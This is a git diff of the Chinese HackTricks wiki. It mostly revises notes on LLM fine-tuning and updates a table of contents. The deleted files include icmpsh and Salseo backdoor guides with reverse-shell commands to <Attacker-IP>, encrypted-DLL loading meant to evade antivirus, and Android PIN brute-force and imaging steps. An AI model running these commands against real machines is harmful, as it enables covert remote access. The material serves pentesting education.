- **权重衰减** 通过添加一个额外的项来修改 **损失计算** 步骤,以惩罚大权重。这鼓励优化器找到具有较小权重的解决方案,在良好拟合数据和保持模型简单之间取得平衡,防止机器学习模型过拟合,避免模型对任何单一特征赋予过多重要性。
- **权重衰减** 通过添加一个额外的项来修改 **损失计算** 步骤,以惩罚大权重。这鼓励优化器找到具有较小权重的解决方案,在很好地拟合数据和保持模型简单之间取得平衡,防止机器学习模型过拟合,避免模型对任何单一特征赋予过多重要性。
- 传统优化器如带有 L2 正则化的 SGD 将权重衰减与损失函数的梯度结合。然而,**AdamW**Adam 优化器的一个变体)将权重衰减与梯度更新解耦,从而实现更有效的正则化。
- 用于训练的设备
- 训练轮数:遍历训练数据的次数
@ -832,8 +834,8 @@ model.train() # Back to training model applying all the configurations
> [!TIP]
> 为了提高学习率,有几个相关的技术叫做 **linear warmup** 和 **cosine decay.**
>
> **Linear warmup** 的定义是设定一个初始学习率和一个最大学习率,并在每个 epoch 后持续更新。这是因为以较小的权重更新开始训练可以减少模型在训练阶段遇到大且不稳定更新的风险。\
> **Cosine decay** 是一种技术,它在 **warmup** 阶段后 **逐渐减少学习率**,遵循半余弦曲线,减缓权重更新以 **最小化超调** 损失最小值的风险,并确保后期训练的稳定性。
> **Linear warmup** 的定义是设定一个初始学习率和一个最大学习率,并在每个 epoch 后持续更新。这是因为以较小的权重更新开始训练可以降低模型在训练阶段遇到大且不稳定更新的风险。\
> **Cosine decay** 是一种 **逐渐减少学习率** 的技术,遵循半余弦曲线 **在 warmup** 阶段之后,减缓权重更新以 **最小化超调** 损失最小值的风险,并确保后期训练的稳定性。
>
> _请注意这些改进未包含在之前的代码中。_
@ -936,8 +938,11 @@ model.eval() # Put in eval mode
有两个快速脚本可以在本地加载 GPT2 权重。对于这两个脚本,您可以在本地克隆仓库 [https://github.com/rasbt/LLMs-from-scratch](https://github.com/rasbt/LLMs-from-scratch),然后:
- 脚本 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/01_main-chapter-code/gpt_generate.py) 将下载所有权重并将格式从 OpenAI 转换为我们 LLM 所期望的格式。该脚本还准备了所需的配置和提示:“每一次努力都在推动你”
- 脚本 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) 允许您在本地加载任何 GPT2 权重(只需更改 `CHOOSE_MODEL` 变量)并从一些提示中预测文本。
- 脚本 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch05/02_alternative_weight_loading/weight-loading-hf-transformers.ipynb) 允许您在本地加载任何 GPT2 权重(只需更改 `CHOOSE_MODEL` 变量)并根据一些提示预测文本。
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

8
src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md
View File

@ -1,11 +1,13 @@
# 7.0. LoRA 在微调中的改进
{{#include /banners/hacktricks-training.md}}
## LoRA 改进
> [!TIP]
> 使用 **LoRA 大大减少了所需的计算****微调** 已经训练好的模型。
LoRA 使得通过仅更改模型的 **小部分** 来高效地微调 **大型模型** 成为可能。它减少了需要训练的参数数量,从而节省了 **内存****计算资源**。这是因为:
LoRA 使得通过仅更改模型的 **小部分** 来高效地微调 **大型模型** 成为可能。它减少了需要训练的参数数量,从而节省了 **内存****计算资源**。这是因为:
1. **减少可训练参数的数量**LoRA 不更新模型中的整个权重矩阵,而是将权重矩阵 **拆分** 为两个较小的矩阵(称为 **A****B**)。这使得训练 **更快**,并且需要 **更少的内存**,因为需要更新的参数更少。
@ -56,6 +58,8 @@ else:
# Recursively apply the same function to child modules
replace_linear_with_lora(module, rank, alpha)
```
## 参考文献
## 参考
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

32
src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md
View File

@ -1,40 +1,42 @@
# 7.1. Fine-Tuning for Classification
## What is
{{#include /banners/hacktricks-training.md}}
微调是将一个**预训练模型**的过程,该模型已经从大量数据中学习了**通用语言模式**,并将其**调整**以执行**特定任务**或理解特定领域的语言。这是通过在一个较小的、特定任务的数据集上继续训练模型来实现的,使其能够调整参数以更好地适应新数据的细微差别,同时利用其已经获得的广泛知识。微调使模型能够在专业应用中提供更准确和相关的结果,而无需从头开始训练一个新模型。
## 什么是
微调是将一个**预训练模型**的过程,该模型已经从大量数据中学习了**通用语言模式**,并将其**调整**以执行**特定任务**或理解特定领域的语言。这是通过在一个较小的、特定任务的数据集上继续训练模型来实现的,使其能够调整参数,以更好地适应新数据的细微差别,同时利用其已经获得的广泛知识。微调使模型能够在专业应用中提供更准确和相关的结果,而无需从头开始训练一个新模型。
> [!TIP]
> 由于预训练一个“理解”文本的LLM相当昂贵,因此通常更容易和便宜地微调开源的预训练模型以执行我们希望其执行的特定任务。
> 由于预训练一个“理解”文本的LLM成本相当高,因此通常更容易和便宜地微调开源的预训练模型以执行我们希望其执行的特定任务。
> [!TIP]
> 本节的目标是展示如何微调一个已经预训练的模型因此LLM将选择给出**给定文本被分类到每个给定类别的概率**(例如,文本是否为垃圾邮件)。
## Preparing the data set
## 准备数据集
### Data set size
### 数据集大小
当然为了微调模型您需要一些结构化数据来专门化您的LLM。在[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb)中提出的示例中GPT2被微调以检测电子邮件是否为垃圾邮件使用的数据来自[https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)_。
该数据集包含的“非垃圾邮件”示例远多于“垃圾邮件”示例,因此本书建议**仅使用与“垃圾邮件”相同数量的“非垃圾邮件”示例**(因此,从训练数据中删除所有额外示例)。在这种情况下,每种情况有747个示例。
该数据集包含的“非垃圾邮件”示例远多于“垃圾邮件”示例,因此本书建议**仅使用与“垃圾邮件”相同数量的“非垃圾邮件”示例**(因此,从训练数据中删除所有额外示例)。在这种情况下,每种类型各有747个示例。
然后,**70%**的数据集用于**训练****10%**用于**验证****20%**用于**测试**。
- **验证集**在训练阶段用于微调模型的**超参数**并做出关于模型架构的决策,有效地通过提供模型在未见数据上的表现反馈来帮助防止过拟合。它允许在不偏倚最终评估的情况下进行迭代改进。
- 这意味着尽管此数据集中包含的数据不直接用于训练,但它用于调整最佳**超参数**,因此该集不能像测试集那样用于评估模型的性能。
- 这意味着尽管此数据集中包含的数据不直接用于训练,但它用于调整最佳**超参数**,因此该集不能像测试集那样用于评估模型的性能。
- 相比之下,**测试集**仅在模型完全训练并完成所有调整后使用;它提供了对模型在新未见数据上泛化能力的无偏评估。对测试集的最终评估提供了模型在实际应用中预期表现的现实指示。
### Entries length
### 条目长度
由于训练示例期望条目(在这种情况下为电子邮件文本)具有相同的长度,因此决定通过添加`<|endoftext|>`的ID作为填充使每个条目与最条目一样大。
由于训练示例期望条目(在这种情况下为电子邮件文本)具有相同的长度,因此决定通过添加`<|endoftext|>`的ID作为填充使每个条目与最长的条目一样大。
### Initialize the model
### 初始化模型
使用开源预训练权重初始化模型进行训练。我们之前已经做过这个,并按照[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb)的说明,您可以轻松做到这一点。
使用开源预训练权重初始化模型进行训练。我们之前已经做过这个,并按照[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb)的说明,您可以轻松做到这一点。
## Classification head
## 分类头
在这个特定示例中预测文本是否为垃圾邮件我们并不关心根据GPT2的完整词汇进行微调而只希望新模型能够判断电子邮件是否为垃圾邮件1或不是0。因此我们将**修改最终层**,使其提供每个词汇的token的概率改为仅提供是否为垃圾邮件的概率就像一个包含2个单词的词汇
在这个特定示例中预测文本是否为垃圾邮件我们并不关心根据GPT2的完整词汇进行微调而只希望新模型能够判断电子邮件是否为垃圾邮件1或不是0。因此我们将**修改最终层**,使其给出每个词汇的概率,改为仅给出是否为垃圾邮件的概率就像一个包含2个单词的词汇
```python
# This code modified the final layer with a Linear one with 2 outs
num_classes = 2
@ -66,7 +68,7 @@ param.requires_grad = True
在之前的部分中LLM通过减少每个预测标记的损失进行训练尽管几乎所有预测的标记都在输入句子中只有最后一个是真正预测的以便模型更好地理解语言。
在这种情况下,我们只关心模型是否能够预测该模型是否为垃圾邮件,因此我们只关心最后一个预测的标记。因此,需要修改我们之前的训练损失函数,仅考虑该标记。
在这种情况下,我们只关心模型是否能够预测该模型是垃圾邮件,因此我们只关心最后一个预测的标记。因此,需要修改我们之前的训练损失函数,仅考虑该标记。
这在 [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb) 中实现为:
```python
@ -108,3 +110,5 @@ return loss
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

20
src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md
View File

@ -1,11 +1,13 @@
# 7.2. 微调以遵循指令
{{#include /banners/hacktricks-training.md}}
> [!TIP]
> 本节的目标是展示如何**微调一个已经预训练的模型以遵循指令**,而不仅仅是生成文本,例如,作为聊天机器人响应任务。
## 数据集
为了微调一个 LLM 以遵循指令,需要一个包含指令和响应的数据集来微调 LLM。训练 LLM 以遵循指令有不同的格式,例如:
为了微调一个 LLM 以遵循指令,需要一个包含指令和响应的数据集来微调 LLM。有不同的格式可以训练 LLM 以遵循指令,例如:
- Apply Alpaca 提示样式示例:
```csharp
@ -27,7 +29,7 @@ Can you explain what gravity is in simple terms?
<|Assistant|>
Absolutely! Gravity is a force that pulls objects toward each other.
```
使用这些数据集训练LLM而不仅仅是原始文本可以帮助LLM理解它需要对收到的问题给出具体的回答。
使用这些数据集训练LLM而不仅仅是原始文本可以帮助LLM理解它需要对收到的问题给出具体的回答。
因此,处理包含请求和答案的数据集时,首先要做的事情之一是将这些数据建模为所需的提示格式,例如:
```python
@ -56,10 +58,10 @@ print(model_input + desired_response)
然后,需要对所有输入和期望输出进行批处理以进行训练。为此,需要:
- 对文本进行标记化
- 将所有样本填充到相同的长度通常长度将与用于预训练LLM的上下文长度一样大
- 将所有样本填充到相同的长度通常长度将与用于预训练LLM的上下文长度相同
- 在自定义合并函数中将输入向右移动1以创建期望的标记
- 用-100替换一些填充标记以将其排除在训练损失之外在第一个`endoftext`标记之后,将所有其他`endoftext`标记替换为-100因为使用`cross_entropy(...,ignore_index=-100)`意味着它将忽略目标为-100的情况
- \[可选\] 使用-100掩盖所有属于问题的标记以便LLM仅学习如何生成答案。在应用Alpaca风格时这将意味着掩盖所有内容直到`### Response:`
- \[可选\] 使用-100掩盖所有属于问题的标记以便LLM仅学习如何生成答案。在应用Alpaca风格时这将意味着掩盖直到`### Response:`的所有内容
创建好这些后,是时候为每个数据集(训练、验证和测试)创建数据加载器。
@ -77,16 +79,16 @@ print(model_input + desired_response)
验证响应质量的其他测试:
1. **测量大规模多任务语言理解(**[**MMLU**](https://arxiv.org/abs/2009.03300)**** MMLU评估模型在57个学科包括人文学科、科学等中的知识和解决问题的能力。它使用多项选择题在不同难度级别(从初级到高级专业)评估理解能力
1. **测量大规模多任务语言理解(**[**MMLU**](https://arxiv.org/abs/2009.03300)**** MMLU评估模型在57个学科包括人文学科、科学等中的知识和解决问题的能力。它使用多项选择题在从初级到高级专业的不同难度级别上评估理解
2. [**LMSYS聊天机器人竞技场**](https://arena.lmsys.org):该平台允许用户并排比较不同聊天机器人的响应。用户输入提示,多个聊天机器人生成可以直接比较的响应。
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**** AlpacaEval是一个自动评估框架其中像GPT-4这样的高级LLM评估其他模型对各种提示的响应。
4. **通用语言理解评估(**[**GLUE**](https://gluebenchmark.com/)**** GLUE是九个自然语言理解任务的集合包括情感分析、文本蕴含和问答。
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**** 在GLUE的基础上SuperGLUE包括更具挑战性的任务旨在对当前模型构成困难。
6. **超越模仿游戏基准(**[**BIG-bench**](https://github.com/google/BIG-bench)**** BIG-bench是一个大规模基准包含200多个任务测试模型在推理、翻译和问答等领域的能力。
7. **语言模型的整体评估(**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**** HELM提供了在准确性、鲁棒性和公平性等各种指标上的全面评估。
8. [**OpenAI Evals**](https://github.com/openai/evals)**** OpenAI的开源评估框架允许对AI模型进行自定义和标准化任务的测试。
9. [**HumanEval**](https://github.com/openai/human-eval)**** 一系列编程问题,用于评估语言模型的代码生成能力
10. **斯坦福问答数据集(**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**** SQuAD由关于维基百科文章的问题组成,模型必须理解文本以准确回答。
8. [**OpenAI评估**](https://github.com/openai/evals)**** OpenAI的开源评估框架允许对AI模型进行自定义和标准化任务的测试。
9. [**HumanEval**](https://github.com/openai/human-eval)**** 一组用于评估语言模型代码生成能力的编程问题
10. **斯坦福问答数据集(**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**** SQuAD包含关于维基百科文章的问题,模型必须理解文本以准确回答。
11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**** 一个大规模的琐事问题和答案数据集,以及证据文档。
还有很多很多其他的
@ -98,3 +100,5 @@ print(model_input + desired_response)
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

14
src/AI/AI-llm-architecture/README.md
View File

@ -1,5 +1,7 @@
# LLM 训练 - 数据准备
{{#include /banners/hacktricks-training.md}}
**这些是我从非常推荐的书籍中做的笔记** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **以及一些额外的信息。**
## 基本信息
@ -22,7 +24,7 @@
## 2. 数据采样
> [!TIP]
> 这个第二阶段的目标非常简单:**对输入数据进行采样,并为训练阶段准备,通常通过将数据集分成特定长度的句子,并生成预期的响应。**
> 这个第二阶段的目标非常简单:**对输入数据进行采样,并为训练阶段准备数据,通常通过将数据集分成特定长度的句子,并生成预期的响应。**
{{#ref}}
2.-data-sampling.md
@ -40,11 +42,11 @@
3.-token-embeddings.md
{{#endref}}
## 4. 注意机制
## 4. 注意机制
> [!TIP]
> 这个第四阶段的目标非常简单:**应用一些注意机制**。这些将是许多**重复的层**,将**捕捉词汇表中单词与当前用于训练 LLM 的句子中其邻居的关系**。\
> 为此使用了很多层,因此将有很多可训练的参数来捕捉这些信息。
> 这个第四阶段的目标非常简单:**应用一些注意机制**。这些将是许多**重复的层**,将**捕捉词汇表中单词与当前用于训练 LLM 的句子中其邻居的关系**。\
> 为此使用了许多层,因此许多可训练的参数将捕捉这些信息。
{{#ref}}
4.-attention-mechanisms.md
@ -53,7 +55,7 @@
## 5. LLM 架构
> [!TIP]
> 这个第五阶段的目标非常简单:**开发完整 LLM 的架构**。将所有内容整合在一起,应用所有层并创建所有函数以生成文本或将文本转换为 ID 及反向操作。
> 这个第五阶段的目标非常简单:**开发完整 LLM 的架构**。将所有内容整合在一起,应用所有层并创建所有函数以生成文本或将文本转换为 ID 及反向操作。
>
> 该架构将用于训练和预测文本。
@ -96,3 +98,5 @@
{{#ref}}
7.2.-fine-tuning-to-follow-instructions.md
{{#endref}}
{{#include /banners/hacktricks-training.md}}

30
src/SUMMARY.md
View File

@ -149,6 +149,7 @@
- [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
- [macOS Bypassing Firewalls](macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md)
- [macOS Defensive Apps](macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md)
- [Macos Dyld Hijacking And Dyld Insert Libraries](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md)
- [macOS GCD - Grand Central Dispatch](macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md)
- [macOS Kernel & System Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
- [macOS IOKit](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md)
@ -217,8 +218,10 @@
# 🪟 Windows Hardening
- [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
- [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
- [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
- [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
- [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
- [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md)
- [ACLs - DACLs/SACLs/ACEs](windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md)
@ -248,6 +251,7 @@
- [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
- [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md)
- [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md)
- [Ad Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
- [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
- [AD DNS Records](windows-hardening/active-directory-methodology/ad-dns-records.md)
- [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
@ -330,7 +334,7 @@
- [Manual DeObfuscation](mobile-pentesting/android-app-pentesting/manual-deobfuscation.md)
- [React Native Application](mobile-pentesting/android-app-pentesting/react-native-application.md)
- [Reversing Native Libraries](mobile-pentesting/android-app-pentesting/reversing-native-libraries.md)
- [Smali - Decompiling/\[Modifying\]/Compiling](mobile-pentesting/android-app-pentesting/smali-changes.md)
- [Smali - Decompiling, Modifying, Compiling](mobile-pentesting/android-app-pentesting/smali-changes.md)
- [Spoofing your location in Play Store](mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md)
- [Tapjacking](mobile-pentesting/android-app-pentesting/tapjacking.md)
- [Webview Attacks](mobile-pentesting/android-app-pentesting/webview-attacks.md)
@ -388,6 +392,7 @@
- [Buckets](network-services-pentesting/pentesting-web/buckets/README.md)
- [Firebase Database](network-services-pentesting/pentesting-web/buckets/firebase-database.md)
- [CGI](network-services-pentesting/pentesting-web/cgi.md)
- [Django](network-services-pentesting/pentesting-web/django.md)
- [DotNetNuke (DNN)](network-services-pentesting/pentesting-web/dotnetnuke-dnn.md)
- [Drupal](network-services-pentesting/pentesting-web/drupal/README.md)
- [Drupal RCE](network-services-pentesting/pentesting-web/drupal/drupal-rce.md)
@ -398,7 +403,6 @@
- [Flask](network-services-pentesting/pentesting-web/flask.md)
- [Git](network-services-pentesting/pentesting-web/git.md)
- [Golang](network-services-pentesting/pentesting-web/golang.md)
- [GWT - Google Web Toolkit](network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md)
- [Grafana](network-services-pentesting/pentesting-web/grafana.md)
- [GraphQL](network-services-pentesting/pentesting-web/graphql.md)
- [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md)
@ -430,7 +434,7 @@
- [disable_functions bypass - via mem](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md)
- [disable_functions bypass - mod_cgi](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md)
- [disable_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl_exec](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md)
- [PHP - RCE abusing object creation: new $\_GET\["a"\]($\_GET\["b"\])](network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md)
- [Php Rce Abusing Object Creation New Usd Get A Usd Get B](network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md)
- [PHP SSRF](network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md)
- [PrestaShop](network-services-pentesting/pentesting-web/prestashop.md)
- [Python](network-services-pentesting/pentesting-web/python.md)
@ -438,6 +442,7 @@
- [Ruby Tricks](network-services-pentesting/pentesting-web/ruby-tricks.md)
- [Special HTTP headers$$external:network-services-pentesting/pentesting-web/special-http-headers.md$$]()
- [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md)
- [Special Http Headers](network-services-pentesting/pentesting-web/special-http-headers.md)
- [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md)
- [Symfony](network-services-pentesting/pentesting-web/symphony.md)
- [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md)
@ -582,6 +587,7 @@
- [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-__viewstate-parameter.md)
- [Python Yaml Deserialization](pentesting-web/deserialization/python-yaml-deserialization.md)
- [JNDI - Java Naming and Directory Interface & Log4Shell](pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md)
- [Ruby Json Pollution](pentesting-web/deserialization/ruby-_json-pollution.md)
- [Ruby Class Pollution](pentesting-web/deserialization/ruby-class-pollution.md)
- [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)
- [Email Injections](pentesting-web/email-injections.md)
@ -609,6 +615,7 @@
- [hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
- [IDOR](pentesting-web/idor.md)
- [JWT Vulnerabilities (Json Web Tokens)](pentesting-web/hacking-jwt-json-web-tokens.md)
- [JSON, XML and YAML Hacking](pentesting-web/json-xml-yaml-hacking.md)
- [LDAP Injection](pentesting-web/ldap-injection.md)
- [Login Bypass](pentesting-web/login-bypass/README.md)
- [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md)
@ -641,6 +648,7 @@
- [MySQL File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
- [Oracle injection](pentesting-web/sql-injection/oracle-injection.md)
- [Cypher Injection (neo4j)](pentesting-web/sql-injection/cypher-injection-neo4j.md)
- [Sqlmap](pentesting-web/sql-injection/sqlmap.md)
- [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md)
- [dblink/lo_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md)
- [PL/pgSQL Password Bruteforce](pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md)
@ -664,6 +672,7 @@
- [WebSocket Attacks](pentesting-web/websocket-attacks.md)
- [Web Tool - WFuzz](pentesting-web/web-tool-wfuzz.md)
- [XPATH injection](pentesting-web/xpath-injection.md)
- [XS Search](pentesting-web/xs-search.md)
- [XSLT Server Side Injection (Extensible Stylesheet Language Transformations)](pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
- [XXE - XEE - XML External Entity](pentesting-web/xxe-xee-xml-external-entity.md)
- [XSS (Cross Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md)
@ -845,13 +854,14 @@
# ✍️ TODO
- [Other Big References](todo/references.md)
- [Interesting Http](todo/interesting-http.md)
- [Rust Basics](todo/rust-basics.md)
- [More Tools](todo/more-tools.md)
- [MISC](todo/misc.md)
- [Pentesting DNS](todo/pentesting-dns.md)
- [Hardware Hacking](todo/hardware-hacking/README.md)
- [Fault Injection Attacks](todo/hardware-hacking/fault_injection_attacks.md)
- [I2C](todo/hardware-hacking/i2c.md)
- [Side Channel Analysis](todo/hardware-hacking/side_channel_analysis.md)
- [UART](todo/hardware-hacking/uart.md)
- [Radio](todo/hardware-hacking/radio.md)
- [JTAG](todo/hardware-hacking/jtag.md)
@ -878,8 +888,6 @@
- [Other Web Tricks](todo/other-web-tricks.md)
- [Interesting HTTP$$external:todo/interesting-http.md$$]()
- [Android Forensics](todo/android-forensics.md)
- [TR-069](todo/tr-069.md)
- [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)
- [Online Platforms with API](todo/online-platforms-with-api.md)
- [Stealing Sensitive Information Disclosure from a Web](todo/stealing-sensitive-information-disclosure-from-a-web.md)
- [Post Exploitation](todo/post-exploitation.md)
@ -887,3 +895,11 @@
- [Cookies Policy](todo/cookies-policy.md)
- [Readme](blockchain/blockchain-and-crypto-currencies/README.md)
- [Readme](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md)
- [Readme](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md)
- [Readme](pentesting-web/web-vulnerabilities-methodology/README.md)
- [Readme](reversing/cryptographic-algorithms/README.md)
- [Readme](reversing/reversing-tools/README.md)
- [Readme](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md)

27
src/android-forensics.md
View File

@ -1,27 +0,0 @@
# Android Forensics
{{#include ./banners/hacktricks-training.md}}
## 锁定设备
要开始从 Android 设备提取数据,设备必须解锁。如果设备被锁定,您可以:
- 检查设备是否已通过 USB 激活调试。
- 检查可能的 [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)
- 尝试使用 [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)
## 数据获取
创建一个 [android backup using adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) 并使用 [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/) 提取: `java -jar abe.jar unpack file.backup file.tar`
### 如果有 root 访问或物理连接到 JTAG 接口
- `cat /proc/partitions`(搜索闪存的路径,通常第一个条目是 _mmcblk0_,对应整个闪存)。
- `df /data`(发现系统的块大小)。
- dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096使用从块大小收集的信息执行
### 内存
使用 Linux Memory Extractor (LiME) 提取 RAM 信息。这是一个应该通过 adb 加载的内核扩展。
{{#include ./banners/hacktricks-training.md}}

25
src/backdoors/icmpsh.md
View File

@ -1,25 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
从以下地址下载后门: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
# 客户端
执行脚本: **run.sh**
**如果出现错误,请尝试更改以下行:**
```bash
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
```
**对于:**
```bash
echo Please insert the IP where you want to listen
read IP
```
# **受害者端**
**icmpsh.exe** 上传到受害者并执行:
```bash
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
```
{{#include ../banners/hacktricks-training.md}}

158
src/backdoors/salseo.md
View File

@ -1,158 +0,0 @@
# Salseo
{{#include ../banners/hacktricks-training.md}}
## 编译二进制文件
从github下载源代码并编译**EvilSalsa**和**SalseoLoader**。您需要安装**Visual Studio**来编译代码。
为您将要使用的Windows盒子的架构编译这些项目如果Windows支持x64则为该架构编译
您可以在Visual Studio的**左侧“Build”选项卡**中的**“Platform Target”**选择架构。
**如果找不到此选项,请点击**“Project Tab”**,然后点击**“\<Project Name> Properties”**
![](<../images/image (132).png>)
然后构建这两个项目Build -> Build Solution在日志中将出现可执行文件的路径
![](<../images/image (1) (2) (1) (1) (1).png>)
## 准备后门
首先,您需要编码**EvilSalsa.dll**。为此您可以使用python脚本**encrypterassembly.py**,或者您可以编译项目**EncrypterAssembly**
### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
好的,现在你拥有执行所有 Salseo 操作所需的一切:**编码的 EvilDalsa.dll** 和 **SalseoLoader 的二进制文件**
**将 SalseoLoader.exe 二进制文件上传到机器上。它们不应该被任何 AV 检测到...**
## **执行后门**
### **获取 TCP 反向 shell通过 HTTP 下载编码的 dll**
记得启动 nc 作为反向 shell 监听器,并启动一个 HTTP 服务器来提供编码的 evilsalsa。
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **获取UDP反向Shell通过SMB下载编码的dll**
记得启动nc作为反向Shell监听器并启动SMB服务器以提供编码的evilsalsaimpacket-smbserver
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
